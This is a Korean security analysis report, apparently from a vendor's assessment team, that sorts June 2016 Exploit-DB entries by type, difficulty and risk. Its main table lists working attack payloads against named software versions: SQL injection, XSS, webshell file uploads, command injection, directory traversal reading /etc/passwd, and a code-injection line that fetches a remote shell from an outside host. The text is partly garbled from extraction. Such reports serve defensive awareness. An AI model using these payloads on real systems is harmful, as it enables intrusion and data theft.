EDB 분석보고서 (06.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code

Similar documents
76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

3장

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

제목 레이아웃

Secure Programming Lecture1 : Introduction

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

PowerPoint プレゼンテーション

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

105È£4fš

Ç¥Áö

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

DocsPin_Korean.pages

23

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

untitled

FileMaker 15 WebDirect 설명서

untitled

Microsoft Word - junior.docx

untitled

ODS-FM1

목순 차서 v KM의 현황 v Web2.0 의 개념 v Web2.0의 도입 사례 v Web2.0의 KM 적용방안 v 고려사항 1/29

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

ibmdw_rest_v1.0.ppt

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

UNIST_교원 홈페이지 관리자_Manual_V1.0

Portal_9iAS.ppt [읽기 전용]

歯MW-1000AP_Manual_Kor_HJS.PDF

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

C H A P T E R 2

접근성과 웹 The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee, the inventor

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

초보자를 위한 ASP.NET 2.0

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

Backup Exec

untitled

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

0125_ 워크샵 발표자료_완성.key

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

3ÆÄÆ®-14

10X56_NWG_KOR.indd

게시판 스팸 실시간 차단 시스템

Microsoft PowerPoint 웹 연동 기술.pptx

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

슬라이드 1

초보자를 위한 ADO 21일 완성

untitled

Remote UI Guide

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

PowerPoint 프레젠테이션

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

*****

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

PowerPoint 프레젠테이션

Microsoft PowerPoint - 발표_090513_IBM세미나_IPTV_디디오넷_완료.ppt

Microsoft Word - Windows_apahce_php_CUBRID2008

Supplier_Connect_User_Guide_Korean

thesis

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.

vm-웨어-01장

Observational Determinism for Concurrent Program Security

PowerPoint Template

BEef 사용법.pages

MySQL-Ch05

Cache_cny.ppt [읽기 전용]

3GA1Æ2Æ3 /4GA1Æ2Æ3 Series B-137

Page 1 / 솔루션소개 WordPress WordPress는세계에서가장인기있는오픈소스웹사이트제작관리도구입니다. 웹표준, 접근성, SEO( 검색엔진최적화 ) 등의강점이있으며다양한테마와확장기능을제공합니다. 2. 설치버전 하기명시된버전은권장설치버전이며필요시다른

Orcad Capture 9.x

Sena Device Server Serial/IP TM Version

bn2019_2

スライド タイトルなし

Week13

1

Windows 네트워크 사용 설명서

partprime_intro.key

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Page 1 / 솔루션소개 Magento Magento 는강력한기능을제공하는오픈소스쇼핑몰제작관리도구입니다. 커스터마이징가 능한글로벌쇼핑몰구축시에사용을권장하며, 자체마켓플레이스를보유하고있을정도 로다양한기능을유 / 무료로추가할수있습니다. 2. 설치버전 하기명시된

Transcription:

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 06 년 6 월은상반기 Exploit-DB 보고개수가가장많은달이었습니다. 그만큼공격의종류도다양게보고되었습니다. SQL, XSS 등의공격보고개수가가장많았지만새로운공격방법이나공격패턴의특이점은발견되지않았습니다. SQL 대부분은공격난이도및위험도가낮은들이다수였으며, 단순히이있는지확인을위한공격패턴들이었습니다. 그러나해당공격패턴이성공여이발견된프로그램들은추가적인공격이들어올수있으므로발견된페이지와파라미터를확인여시큐어코딩및소프트웨어업데이트가필수적으로요구됩니다. SQL 이외 PHP Code 이발견된개수가 3 위로보고되었습니다. PHP Code 은 SQL 에비해상대적으로위험도가낮은에속지만많은웹사이트가 PHP 로이루어져있어공격빈도가높은입니다. PHP Code 에노출되지않도록 fputs 와 fwrite 등 PHP 에서실제적으로사용되는함수와명령어는미리정의여서쓰는것이요구됩니다.. 별보고개수 보고개수 RFI Command 3 File Upload 3 LFI 4 4 Code 4 XSS 3 SQL 7 총합계 49 8 6 4 0 8 6 4 0 RFI 3 3 Command 별보고개수 4 4 4 File Upload LFI Code 3 XSS 7 SQL. 위험도별분류 위험도 보고개수 백분율 상 5 0.0% 44 89.80% 합계 49 00.00% 위험도별분류 5 상 44 3. 공격난이도별현황공격난이도 보고개수 백분율 상 4.08% 5 30.6% 3 65.3% 총합계 49 00.00% 공격난이도별현황 5 3 상 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 5 Wordpress 4 Nagios 3 XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Tiki-Wiki CMS Liferay CE Vicidial Ktools Dokeos wwiki 총합계 49 주요소프트웨어별발생현황 5 4 3 Wordpress Nagios XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-0 39876 Code.0.3. - index.php Remote Command Execution POST /%0.0.3./ajaxexplorer/index.php HTTP/..0.3. strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext =<?php exec($_get["cmd"]);?> 06-06-0 39876 XSS.0.3. - index.php XSS POST /%0.0.3./ajaxexplorer/index.php HTTP/..0.3. strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext =<script>alert(666)</script> 06-06-0 3988 File Upload POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Relay Ajax Manager Content-Type: multipart/form-data; boundary=--------------------------- relayb0-07706,.5.,.5.3-7dd009908f / File Upload -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="info.php" Content-Type: application/octet-stream Relay Ajax Manager Relay Ajax Manager relayb0-07706,.5.,.5.3 <? phpinfo();?> -----------------------------7dd009908f-- 06-06-0 39880 XSS Liferay CE < 6. CE GA6 - /liferay/web/guest/ XSS POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=&p_p_state= maximized&p_p_mode=view&_58_struts_action=%flogin%fcreat e_account HTTP/. Liferay CE Liferay CE < 6. CE GA6 _58_firstName=%%3E%3Cscript%3Ealert%8%7xss%7%9 %3C% 06-06-0 39879 SQL 상 SecurityCheck Extension.8.9 - index.php SQL /index.php?option='or(extractvalue(,concat(0x3a,(select(database()) ))))=' SecurityCheck Extension.8.9 06-06-06 39899 SQL 상 Nagios XI 5..7 - nagiosim.php SQL Injction /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolv e&host=a&service='+and+(select++from(select+count(*),co NCAT(' APIKEY ',(SELECT+MID((IFNULL(CAST(backend_ticket+AS+CH AR),0x0)),,54)+FROM+xi_users+WHERE+user_id%3d+LIMIT+0,), ' APIKEY ',FLOOR(RAND(0)*))x+FROM+INFORMATION_SCHEMA.CH ARACTER_SETS+GROUP+BY+x)a)+OR+' Nagios Nagios XI 5..7

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-06 39898 LFI rconfig 3.. - downloadfile.php LFI /lib/crud/downloadfile.php?download_file=/etc/passwd rconfig rconfig 3.. 06-06-06 39897 SQL 상상 Notilus Travel Solution Software 0 R3 - Password.aspx SQL POST /company/profilv4/password.aspx HTTP/. ACTION=&H_OLD=mypass'%3bdeclare%0@q%0varchar(99)%3 bset%0@q%3d'\\\\testdomain.mydo'%b'main.com\\vps'% 3b%0exec%0master.dbo.xp_dirtree%0@q%3b-- %0&H_NEW=%7+or+%7%7%3D%7&H_NEW=%7+or+ %7%7%3D%7 Notilus Travel Solution Travel Solution S Software 0 R 06-06-06 39896 SQL 상 Double Opt-In for Download Plugin.0.9 - admin-ajax.php SQL POST /wp-admin/adminajax.php?action=populate_download_edit_form HTTP/. Wordpress Double Opt- In for Download Plugin.0. id=0 UNION SELECT,, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID= 06-06-06 3989 RFI WP Mobile Detector /wp-content/plugins/wp-mobiledetector/resize.php?src=http://www.test.com/index.php Plugin 3.5 - resize.php RFI Wordpress WP Mobile Detector Plugin 3.5 06-06-06 39890 SQL Electroweb Online Examination System.0 - showtest.php SQL /showtest.php?subid=%0and%0=-- Electroweb Electroweb Online Examination System.0 06-06-06 39899 Command Nagios XI 5..7 - nagiosim.php Command /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update& token=<apitoken>&incident_id=<valid incident id>&title=title'; touch /tmp/file; echo&status= Nagios Nagios XI 5..7 06-06-06 39899 Command Nagios XI 5..7 - graphapi.php Command /nagiosxi/includes/components/perfdata/graphapi.php?host=<any monitoredhost IP>&start=&end=; touch /tmp/file; Nagios Nagios XI 5..7

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-06 39886 XSS /continuum/security/useredit_confirmadminpassword.action?userad minpassword=&username=guest&user.username=guest<script>alert( document.cookie)</script>&user.fullname=guest&user.email=blah@p rocheckup.com&user.password=password&user.confirmpassword=pa ssword&user.timestampaccountcreation=&user.timestamplastlogin =&user.timestamplastpasswordchange=&user.locked=false&user.pas swordchangerequired=false&method:confirmadminpassword=subm Apache Continuum.4. - it&cancel=cancel<http://7.0.0.:8080/continuum/security/useredit useredit_confirmadminpasswo _confirmadminpassword.action?useradminpassword=&username=g rd.action XSS uest&user.username=guest%3cscript%3ealert(document.cookie)%3 c/script%3e&user.fullname=guest&user.email=blah@procheckup.co m&user.password=password&user.confirmpassword=password&user. timestampaccountcreation=&user.timestamplastlogin=&user.timest amplastpasswordchange=&user.locked=false&user.passwordchange Required=false&method:confirmAdminPassword=Submit&cancel=Ca ncel> Apache Apache Continuum.4. 06-06-06 39883 LFI Simple Backup /wpadmin/tools.php?page=backup_manager&download_backup_file=ol Plugin.7. - tools.php LFI 취 약점 dbackups/../../../../../../etc/passwd Simple Backup Plugin.7. 06-06-07 39904 XSS POST /goform/administration HTTP/. Cisco EPC 398 - /goform/administration XSS 취 약점 Cisco EPC 398 Cisco EPC 398 working_mode=0&sysname=<script>alert('xss')</script>&syspasswd= home&sysconfirmpasswd=home&save=save+settings&preworkingm ode=&h_wlan_enable=enable&h_user_type=common 06-06-07 39904 XSS Cisco EPC 398 - /goform/wclientmaclist POST /goform/wclientmaclist HTTP/. Cisco EPC 398 Cisco EPC 398 sortwireless=mac&h_sortwireless=mac" onmouseover=alert() x="y 06-06-08 39905 SQL Drale DBTableViewer 003 - /vul_test/dbtableviewer/ SQL /vul_test/dbtableviewer/?orderby=nice_name%0rlike%0(select %0(CASE%0WHEN%0(697=697)%0THEN%00x6e6963655 f6e66d65%0else%00x8%0end))&sort=desc&sort=desc Drale DBTableView er Drale DBTableView er 00 06-06-3 39936 SQL PayPlans (com_payplans) Extension index.php?option=com_payplans&group_id=%0and%0=-- 3.3.6 - index.php SQL PayPlans (com_payplan s) Extension 3.3.6

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-3 3993 File Upload Viart Shopping Cart 5.0 - admin_fm_upload_files.php File Upload POST /admin/admin_fm_upload_files.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------- 7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="newfile_0"; filename="shell.php" Content-Type: application/octet-stream Viart Viart Shopping Cart 5.0 <? phpinfo();?> -----------------------------7dd009908f-- 06-06-5 39956 jbfilemanager - jbfm.php /vul_test/jbfilemanager/jbfm/jbfm.php?act=open&path=/../../../../../.. /../../../etc/ jbfilemanage r jbfilemanage r 06-06-5 39955 XSS Booking System < 5.5 - eventlist.php XSS /scripts/booking/eventlist.php?serviceid=337%%0onmouseover =%alert() Booking System < 5.5 06-06-5 39953 SQL En Masse (com_enmasse) Component 5. - 6.4 - /component/enmasse/ SQL /component/enmasse/term?tmpl=component&id=%0and%0=- - En Masse (com_enmass e) Component 5. 06-06-5 3995 SQL Dokeos.. - slideshow.php SQL /dokeos-../main/document/slideshow.php?cidreq=3&curdirpath=%7 %0AND%0(SELECT%0*%0FROM%0(SELECT(SLEEP(5)))Pfag) %0AND%0%7NFwV%7=%7NFwV&slide_id=all Dokeos Dokeos.. 06-06-5 39955 SQL Booking System < 5.5 - eventlist.php SQL POST /ajax/checkchangeavailability.php HTTP/. Booking System < 5.5 id=' AND SLEEP(5) AND 'WAlE'='WAlE

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-5 39950 XSS wwiki - index.php XSS POST /vul_test/wwiki/index.php HTTP/. wwiki wwiki page=xss&newtext=afsd%3cimg+src%3d%h%+onerror%3da lert%845%9%3eaa&action=save 06-06-5 39948 XSS Ultrabenosaurus ChatBoard - chat.php XSS POST /vul_test/chatboard/ original/chat.php HTTP/. Ultrabenosau rus ChatBoard Ultrabenosau rus ChatBoard msg=654<img src="z" onerror=zz>asd 06-06-6 39965 Code Tiki-Wiki CMS Calendar 4., /tikicalendar.php?viewmode=%7;%0$z=fopen%8%shell.php%,%7w Calendar 4., Tiki-Wiki CMS.5 LTS, 9. LTS, and 6.5 - Tiki-Wiki CMS tiki-calendar.php Code %7%9;fwrite%8$z,file_get_contents%8%http://hackersite.com/r57.5 LTS, 9..txt%%9%9;fclose%8$z%9;%7 LTS, and 6.5 06-06-7 39970 XSS Vicidial. - admin.php XSS POST / HTTP/. ADD=&DB=&script_id=tests&script_name=<script>alert('XSS!' </script>&script_comments=test& active=y&user_group=---all--- &selectedfield=fullname&script_text=<script>alert('xss!'</script>&submit=submit Vicidial Vicidial. 06-06-0 3998 File Upload Airia - editor.php File Upload POST /editor.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------- 7dd009908f Airia Airia -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream <?php echo 'Airia Webshell Exploit';#{shell};?> -----------------------------7dd009908f-- 06-06-0 39977 SQL BT Media /index.php?option=com_bt_media&view=list&categories[0]=%0an (com_bt_media) Component - d%0=--&itemid=34 index.php SQL BT Media (com_bt_med ia) Component

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 POST /snews.7./?action=process&task=admin_article&id= HTTP/. AppleWebKit/535.7 06-06-0 39976 Command.7. - /snews.7./ KHTML, like Gecko Chrome/6.0.9.75 Command.7. text=[func]system: :"calc.exe"[/func] 06-06-0 39976 XSS.7. - /snews.7./ XSS POST /snews.7./?action=process&task=admin_article&id= HTTP/..7. text=[include]<script>alert(document.cookie)</script>[/include] 06-06- 39989 SQL Publisher Pro /index.php?option=com_publisher&view=issues&itemid=%0and% (com_publisher) Component - 0=--&lang=en index.php SQL Publisher Pro (com_publish er) Component 06-06-3 400 - api.php /vul_test//api.php?callback=jquery076857439986496 76_46666565&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4v Li4vZXRjLw==&_=46666567 06-06-3 40009 XuezhuLi FileSharing - download.php /vul_test/filesharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing 06-06-3 40006 LFI Alibaba Clone BB Script - show_page.php LFI /show_page.php?page=../configure.php%00 Alibaba Clone BB Script Alibaba Clone BB Script 06-06-3 400 XSS - api.php XSS /vul_test//api.php?callback=jquery0787465456 56_466665079}}c07%3Cscript%3Ealert%8%9%3C%fsc ript%3ecfea&type=get&mode=0&_=466665080

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-3 40009 XuezhuLi FileSharing - /vul_test/filesharing/viewing.php?file_name=../../../../../../../../../../../. viewing.php./../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing 06-06-7 4004 SQL 상상 POST /site/index.php/admin/pages/update/ HTTP/. BigTree CMS 4.. - /site/index.php/admin/pages/u pdate/ SQL page=' and 6=3 or =+(SELECT and ROW(,)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(5),CHAR (00),CHAR(05),CHAR(08),CHAR(0),CHAR(09),CHAR(09),CHA R(97),0x3a,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' BigTree CMS BigTree CMS 4.. POST /ibilling/index.php HTTP/. 06-06-7 400 XSS ibilling 3.7.0 - index.php XSS account=%%3e%3cscript%3ealert()%3c%fscript%3e&compa ny=%%3e%3cscript%3ealert()%3c%fscript%3e&email=test %40yahoo.com&phone=%%3E%3Cscript%3Ealert(4)%3C%Fsc ript%3e&address=%%3e%3cscript%3ealert(5)%3c%fscript%3 E&city=%%3E%3Cscript%3Ealert(6)%3C%Fscript%3E&state= %%3E%3Cscript%3Ealert(7)%3C%Fscript%3E&zip=%%3E %3Cscript%3Ealert(8)%3C%Fscript%3E&country=TR&tags%5B%5 D=web_development%%3E%3Cscript%3Ealert(9)%3C%Fscript %3E ibilling ibilling 3.7.0 06-06-7 400 Code MyLittleForum.3.5 - /install/index.php Code POST /install/index.php HTTP/. MyLittleForu m MyLittleForu m.3.5 database=';?><?php echo passthru('/bin/cat /etc/passwd');' 06-06-7 4009 SQL Kagao 3.0 - cat.php SQL /cat.php?id=999999.9%%0union%0all%0select%0concat %80x7e%C0x7%Cunhex%8Hex%8cast%8database%8% 9%0as%0char%9%9%9%C0x7%C0x7e%9--%0a Kagao Kagao 3.0 06-06-7 4007 Code SugarCRM 6.5.8 - index.php Code /index.php?module=connectors&action=runtest&source_id=ext_rest_in sideview&ext_rest_insideview_[%7.phpinfo().%7]= SugarCRM SugarCRM 6.5.8

EDB 분석보고서 (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-06-7 4009 XSS Kagao 3.0 - cat.php XSS /cat.php?id=0&pricestart=0&room=&flache=&price=&zulassung=& kilometer=&kraftstoff=&id3=0&suche=%%3e%3cscript%3ealert %8%7n4tural%7%9%3B%3C%Fscript%3E&id=0&sucheWo =&umkreis=0 Kagao Kagao 3.0 06-06-7 4003 SQL OPAC KpwinSQL - zaznam.php SQL /zaznam.php?detail_num=%0and%0=-- OPAC KpwinSQL OPAC KpwinSQL GET /concrete5/index.php HTTP/. 06-06-9 40045 LFI Concrete5 5.7.3. - index.php LFI X-Original-Url: /tools/../../index Connection: keep-alive Concrete5 Concrete5 5.7.3. 06-06-9 4004 SQL Ultimate Membership Pro Plugin 3.3 - admin-ajax.php SQL POST / HTTP/. action=ihc_preview_user_listing&shortcode=[ihc-list-users filter_by_level="" levels_in="[ihc-list-users filter_by_level="" levels_in="') union all select (SELECT CASE WHEN ($sql) then else *(select table_name from information_schema.tables) end)#" theme="ihc-theme_" theme="ihc-theme_ Wordpress Ultimate Membership Pro Plugin 3.3 06-06-30 40046 SQL POST / HTTP/. Ktools Photostore 4.7.5 - mgr.login.php SQL 취 약점 Ktools Ktools Photostore 4.7.5 email=%7%0and%0=--;#